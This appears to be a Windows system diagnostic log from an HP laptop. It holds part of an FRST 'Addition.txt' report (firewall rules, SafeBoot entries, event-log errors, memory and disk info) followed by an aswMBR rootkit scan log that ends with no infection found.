ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\Public\Desktop\Get Dropbox Offer.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=en_us&pf=cnnb&s=db_dticon&tp=dropbox
==================== Loaded Modules (Whitelisted) ==============
2016-03-03 17:55 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-03-03 17:55 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-03 17:55 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
There are 7872 more sites.
There are 7872 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 05:25 - 2016-03-03 19:07 - 00451004 ____R C:\Windows\system32\Drivers\etc\hosts
There are 15472 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E3864FAE-6A64-49A4-8EC9-93ED035533C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0E191CF9-EFB6-47F7-ABCD-FDC2DADA84F4}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E267825-C5FF-452A-BB7B-D61D1BAD5214}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5D8C4951-5247-4508-9227-738C2E481BBE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D2F776E5-A0FF-460E-AA6F-2BF364B356A4}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{3C2C7B6D-7FA7-4A1A-8F9B-6303B534F974}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{B27066B6-B172-48F5-9D12-CCDD387530E5}] => (Allow) LPort=15600
FirewallRules: [{B6561EA3-49FD-4DA8-A039-364D5B0A1C84}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{DE3C52FC-975B-420C-8848-2DE54A0C9AF8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B94C8BC6-6BB9-48D4-9486-3B2866AA6B72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9A46FF2-CECB-4F9F-9721-3E9B07F6BFF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
04-03-2016 05:39:24 McAfee Vulnerability Scanner
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 10:51:13 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\1e9c8a81-9089-4f7e-97fa-a873753b1cb9.dmp
Error: (03/03/2016 08:04:20 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10007) (User: NT AUTHORITY)
Description: Application or service 'HPWMISVC' could not be restarted.
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 05:32:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 1e8
Start Time: 01d175b518e46520
Termination Time: 15
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 04908aea-e1a9-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:28:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.18123 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 63c
Start Time: 01d175b4af4ee3db
Termination Time: 0
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
Report Id: 503e36bc-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:26:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: ce8
Start Time: 01d175b4af7c314d
Termination Time: 52
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 2007fa25-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 04:24:25 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\8ab6acec-cd82-4048-9469-19bd029fa366.dmp
System errors:
=============
Error: (03/04/2016 09:02:43 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:34 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:00:51 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056
Error: (03/04/2016 09:00:26 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (03/04/2016 09:00:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Security Center Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU N2840 @ 2.16GHz
Percentage of memory in use: 65%
Total physical RAM: 1939.04 MB
Available physical RAM: 666.2 MB
Total Virtual: 3878.07 MB
Available Virtual: 1542.62 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:21.13 GB) (Free:4.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: 1E53D2DD)
Partition: GPT.
==================== End of Addition.txt ============================
aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-03-04 11:12:18
-----------------------------
11:12:18.458 OS Version: Windows x64 6.2.9200
11:12:18.474 Number of processors: 2 586 0x3708
11:12:18.474 ComputerName: FAWNS UserName: Fawn
11:12:18.505 Initialize success
11:12:18.520 VM: initialized successfully
11:12:18.520 VM: Intel CPU BiosDisabled
11:13:09.926 AVAST engine defs: 16030400
11:13:22.387 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:22.387 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:22.403 Disk 0 MBR read successfully
11:13:22.403 Disk 0 MBR scan
11:13:22.419 Disk 0 unknown MBR code
11:13:22.419 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:22.450 Disk 0 scanning C:\Windows\system32\drivers
11:13:22.825 Disk 0 statistics 3842/0/0 @ 29.78 MB/s
11:13:22.825 Scan stopped
11:13:26.515 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:26.515 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:26.531 Disk 0 MBR read successfully
11:13:26.546 Disk 0 MBR scan
11:13:26.562 Disk 0 unknown MBR code
11:13:26.562 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:26.593 Disk 0 scanning C:\Windows\system32\drivers
11:13:28.546 Service scanning
11:13:44.542 Modules scanning
11:13:44.573 Disk 0 trace - called modules:
11:13:44.588 ntoskrnl.exe CLASSPNP.SYS disk.sys sdstor.sys ACPI.sys sdbus.sys hal.dll
11:13:44.604 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xffffe000a5ae1060]
11:13:44.619 3 CLASSPNP.SYS[fffff8000305b170] -> nt!IofCallDriver -> \Device\00000028[0xffffe000a5ad2050]
11:13:44.619 5 sdstor.sys[fffff800035c1ebe] -> nt!IofCallDriver -> [0xffffe000a5a0ebe0]
11:13:44.635 7 ACPI.sys[fffff80002567c21] -> nt!IofCallDriver -> \Device\SdBus-0[0xffffe000a5acd060]
11:13:44.713 AVAST engine scan C:\Windows
11:13:45.356 AVAST engine scan C:\Windows\system32
11:14:44.522 AVAST engine scan C:\Windows\system32\drivers
11:14:46.277 AVAST engine scan C:\Users\Fawn
11:16:19.709 AVAST engine scan C:\ProgramData
11:16:30.592 Disk 0 statistics 1270889/0/0 @ 7.23 MB/s
11:16:30.608 Scan finished successfully
11:16:58.380 Disk 0 MBR has been saved successfully to "C:\Users\Fawn\Desktop\MBR.dat"
11:16:58.395 The log file has been saved successfully to "C:\Users\Fawn\Desktop\aswMBR.txt"